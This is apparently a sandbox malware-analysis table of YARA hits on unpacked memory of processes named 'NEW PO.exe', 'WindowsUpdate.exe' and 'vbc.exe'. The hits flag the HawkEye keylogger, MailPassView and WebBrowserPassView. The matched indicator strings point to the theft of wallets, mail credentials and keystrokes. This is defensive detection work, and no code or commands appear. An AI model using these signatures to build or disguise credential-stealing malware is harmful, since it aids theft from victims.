18.0.WindowsUpdate.exe.409c0d.39.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.409c0d.39.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.409c0d.39.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.409c0d.39.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.39.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
23.0.vbc.exe.400000.1.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.42f2370.46.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.8660000.10.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.409c0d.27.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
23.0.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
22.0.vbc.exe.400000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.45fa72.38.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.2.NEW PO.exe.2acb1c8.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.332d36c.42.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
11.0.vbc.exe.400000.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.12.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
7.0.NEW PO.exe.409c0d.12.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.12.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.409c0d.12.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.12.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
22.0.vbc.exe.400000.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.18.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.3ac2370.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.16.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.16.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.16.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.16.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.16.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.16.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
11.0.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
11.0.vbc.exe.400000.2.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.38.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.38.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.38.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.38.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.38.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.38.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.400000.11.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.11.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.11.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.11.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.11.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.11.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
11.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
22.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.7c60000.36.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.409c0d.7.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
16.0.WindowsUpdate.exe.409c0d.7.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.409c0d.7.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.409c0d.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.409c0d.7.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.400000.4.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
16.0.WindowsUpdate.exe.400000.4.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.400000.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.4.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.400000.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.4.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
17.2.WindowsUpdate.exe.459fbd0.4.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79a59:$key: HawkEyeKeylogger 0x7bcd7:$salt: 099u787978786 0x7a0b6:$string1: HawkEye_Keylogger 0x7af09:$string1: HawkEye_Keylogger 0x7bc37:$string1: HawkEye_Keylogger 0x7a49f:$string2: holdermail.txt 0x7a4bf:$string2: holdermail.txt 0x7a3e1:$string3: wallet.dat 0x7a3f9:$string3: wallet.dat 0x7a40f:$string3: wallet.dat 0x7b7fb:$string4: Keylog Records 0x7bb13:$string4: Keylog Records 0x7bd2f:$string5: do not script --> 0x79a41:$string6: \pidloc.txt 0x79acf:$string7: BSPLIT 0x79adf:$string7: BSPLIT
17.2.WindowsUpdate.exe.459fbd0.4.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
17.2.WindowsUpdate.exe.459fbd0.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
17.2.WindowsUpdate.exe.459fbd0.4.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
17.2.WindowsUpdate.exe.459fbd0.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
17.2.WindowsUpdate.exe.459fbd0.4.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a10e:$hawkstr1: HawkEye Keylogger 0x7af4f:$hawkstr1: HawkEye Keylogger 0x7b27e:$hawkstr1: HawkEye Keylogger 0x7b3d9:$hawkstr1: HawkEye Keylogger 0x7b53c:$hawkstr1: HawkEye Keylogger 0x7b7d3:$hawkstr1: HawkEye Keylogger 0x79c80:$hawkstr2: Dear HawkEye Customers! 0x7b2d1:$hawkstr2: Dear HawkEye Customers! 0x7b428:$hawkstr2: Dear HawkEye Customers! 0x7b58f:$hawkstr2: Dear HawkEye Customers! 0x79da1:$hawkstr3: HawkEye Logger Details:
7.2.NEW PO.exe.409c0d.2.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
10.0.vbc.exe.400000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.3aa9930.8.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.4.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.4.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.4.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.4.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
10.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.42d9930.33.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.2d94168.44.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.13.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
18.0.WindowsUpdate.exe.408208.13.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.13.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.13.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.408208.13.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.408208.13.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
10.0.vbc.exe.400000.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.13.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.0.NEW PO.exe.408208.13.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.408208.13.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.13.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.408208.13.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.13.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
10.0.vbc.exe.400000.2.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.45fa72.12.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
10.0.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.45fa72.19.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.19.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.19.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.45fa72.19.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
0.2.NEW PO.exe.33497d4.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
7.2.NEW PO.exe.7c60000.9.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.2.WindowsUpdate.exe.32fb060.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.409c0d.19.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.408208.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.2.NEW PO.exe.408208.3.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.2.NEW PO.exe.408208.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.2.NEW PO.exe.408208.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.2.NEW PO.exe.408208.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
